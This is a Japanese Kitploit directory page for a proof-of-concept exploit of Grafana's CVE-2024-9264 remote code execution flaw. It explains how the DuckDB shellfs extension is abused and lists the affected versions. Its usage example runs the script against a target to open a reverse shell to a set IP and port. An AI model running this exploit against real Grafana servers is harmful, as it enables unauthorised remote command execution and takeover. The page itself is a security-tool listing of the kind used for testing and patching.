Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9264-RCE-Exploit — Grafana RCEエクスプロイト (CVE-2024-9264) | Kitploit
ツール/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

Grafana RCEエクスプロイト (CVE-2024-9264)

リポジトリを見る
3951年前Kitploit レビュー済み
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-9264-RCE-Exploit: GrafanaのSQL Expressionsを介したRCE

説明

Grafana(CVE-2024-9264)におけるリモートコード実行(RCE)の概念実証です。

このリポジトリには、GrafanaのSQL Expressions機能におけるリモートコード実行(RCE)脆弱性を悪用するPythonスクリプトが含まれています。
不十分な入力サニタイズを利用することで、攻撃者はサーバー上で任意のシェルコマンドを実行できます。
これは、攻撃者がインストールしてロードすることでコマンド実行を可能にするshellfsコミュニティ拡張機能を通じて実現されます。

前提条件

  • Viewer権限以上を持つ認証済みのGrafanaユーザー
  • DuckDBバイナリがインストールされ、GrafanaのPATHからアクセス可能であること

影響を受けるバージョン

Grafana >= v11.0.0(すべてのv11.x.yが影響を受けます)

使用方法

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

例

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

免責事項

このスクリプトは教育目的およびシステムのセキュリティをテストする許可を得た管理された環境での使用を意図しています。このツールの誤用は法的な結果を招く可能性があります。

詳細

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

ツールをダウンロード